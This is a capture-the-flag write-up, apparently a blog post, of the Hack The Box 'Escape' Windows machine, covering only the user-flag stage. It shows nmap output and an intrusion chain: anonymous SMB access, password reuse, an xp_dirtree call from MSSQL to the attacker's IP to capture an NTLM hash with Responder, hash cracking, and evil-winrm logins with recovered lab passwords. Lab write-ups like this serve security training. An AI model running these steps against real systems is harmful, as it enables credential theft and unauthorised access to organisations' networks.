Open in app

Sign in

Write

Sign in

Escape Coursework : HTB

trustie_rity
4 min readMay 7, 2023

--

Escape is a medium rated windows box on HTB platform and this is how i went about solving it.

\

Enumeration

Using nmap we get the following information back.

PORT      STATE SERVICE       VERSION
53/tcp    open  domain        Simple DNS Plus
88/tcp    open  kerberos-sec  Microsoft Windows Kerberos (server time: 2023-03-12 14:17:58Z)
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp   open  ldap          Microsoft Windows Active Directory LDAP (Domain: sequel.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=dc.sequel.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:dc.sequel.htb
| Issuer: commonName=sequel-DC-CA
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2022-11-18T21:20:35
| Not valid after:  2023-11-18T21:20:35
| MD5:   869f7f54b2edff74708d1a6ddf34b9bd
|_SHA-1: 742ab4522191331767395039db9b3b2e27b6f7fa
|_ssl-date: 2023-03-12T14:19:36+00:00; +8h00m00s from scanner time.
445/tcp   open  microsoft-ds?
464/tcp   open  kpasswd5?
593/tcp   open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp   open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: sequel.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2023-03-12T14:19:35+00:00; +8h00m00s from scanner time.
| ssl-cert: Subject: commonName=dc.sequel.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:dc.sequel.htb
| Issuer: commonName=sequel-DC-CA
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2022-11-18T21:20:35
| Not valid after:  2023-11-18T21:20:35
| MD5:   869f7f54b2edff74708d1a6ddf34b9bd
|_SHA-1: 742ab4522191331767395039db9b3b2e27b6f7fa
1433/tcp  open  ms-sql-s      Microsoft SQL Server 2019 15.00.2000.00; RTM
3268/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: sequel.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=dc.sequel.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:dc.sequel.htb
| Issuer: commonName=sequel-DC-CA
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2022-11-18T21:20:35
| Not valid after:  2023-11-18T21:20:35
| MD5:   869f7f54b2edff74708d1a6ddf34b9bd
|_SHA-1: 742ab4522191331767395039db9b3b2e27b6f7fa
|_ssl-date: 2023-03-12T14:19:36+00:00; +8h00m00s from scanner time.
3269/tcp  open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: sequel.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=dc.sequel.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:dc.sequel.htb
| Issuer: commonName=sequel-DC-CA
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2022-11-18T21:20:35
| Not valid after:  2023-11-18T21:20:35
| MD5:   869f7f54b2edff74708d1a6ddf34b9bd
|_SHA-1: 742ab4522191331767395039db9b3b2e27b6f7fa
|_ssl-date: 2023-03-12T14:19:35+00:00; +8h00m00s from scanner time.
5985/tcp  open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-time:
|   date: 2023-03-12T14:18:57
bas|_  start_date: N/A
|_clock-skew: mean: 8h00m00s, deviation: 0s, median: 7h59m59s

ip = 10.10.11.202 domain = sequel.htb
We can add this domain name to /etc/hosts file , this will allow it to map the ip address to the domain name for us thereby working like a dns.
Note OS : Windows 10.0
we basically see that the samba port (445) is open, so we can try to check server mis-configurations such as anonymous logins allowed.

➜  ~ smbclient -L //10.10.11.202
➜  ~ crackmapexec smb 10.10.11.202 -u anonymous -p anonymous --shares
➜  ~ smbclient -U anonymous //10.10.11.202/Public

The first command lists shares and we are able to see that there is a share called public that we can access as proven by the crackmapexec command:
we successfully login and download a pdf that’s there . When we open the pdf in our local setup we get public credentials from the pdf for accessing the public share ; PublicUser:GuestUserCantWrite1.

We could try for password reuse on the mssql db on port 1433, works

➜  ~ impacket-mssqlclient sequel.htb/PublicUser:GuestUserCantWrite1@sequel.htb -p 1433

We could do basic enumeration on the database and there’s not much to see.I will try using the same credentials for ldap.

➜  ~ crackmapexec ldap sequel.htb -u “PublicUser” -p “GuestUserCantWrite1”
  — shows there is a successful ldaps bind.
➜  ~ ldapdomaindump -u “sequel.htb\PublicUser” -p “GuestUserCantWrite1” ldaps://sequel.htb 
  — we specify that we want ldaps
  — ldap fails so we must force the binding to use tls , right :/ 
both ldapsearch and ldapdomaindump fail.
 * we should note that we have two ports for ldap
 * 389/tcp open ldap → this is for ldap
 * 636/tcp open ssl/ldap → this is for ldaps

The next thing we could try is LLMNR poisoning using responder. It is actually easy , we create a fake , rogue smb share and trick the database host machine into trying to authenticate to it. This will allow us to capture his hash as he is doing so.

On our machine we start up responder
➜  ~ sudo responder -I tun0 -v
On the database we execute this!
➜  ~ exec master.dbo.xp_dirtree '\\10.10.16.7\SHARE'

On responder we are able to capture the hash. Save the hash to a file named hash then go ahead and crack it using john the ripper tool.

➜  ~ john --wordlist=/usr/share/wordlists/rockyou.txt hash

We get the credentials as sql_svc:REGGIE1234ronnie. Now we can test if we could login to the machine using this credentials on winrm port.

➜  ~ crackmapexec winrm sequel.htb -u sql_svc -p REGGIE1234ronnie
- we get message (pw3ned) therefore we can login using evil-winrm tool
➜  ~ evil-winrm -i sequel.htb -u sql_svc -p REGGIE1234ronnie
- successfully login.

User Flag

On the box ,we get a non default folder SQLServer in the C:/ Drive. In it we get a record of logs and using this command we are able to get commands for one of the users.

➜  ~ *Evil-WinRM* PS C:\SQLServer\LOgs> Get-Content ERRORLOG.BAK | select-string pass
- Now we can login as user ryan using this credentials.
sequel.htb\Ryan.Cooper : NuclearMosquito3
➜  ~ evil-winrm -i sequel.htb -u Ryan.Cooper -p NuclearMosquito3
The flag is in his desktop.

Root Flag

— — — — — — — — — — — — — Coming — — — — — — -soon — — —

Htb
Htb Writeup
Htb Walkthrough
Escape

--

--

trustie_rity
trustie_rity

Written by trustie_rity

93 Followers
30 Following

Offensive Penetration Tester | M4lici0s Lif3 | Find video walkthroughs on my yt channel: https://www.youtube.com/@trustie_rity https://johnkiguru1337.github.io/

No responses yet

Help

Status

About

Careers

Press

Blog

Privacy

Terms

Text to speech

Teams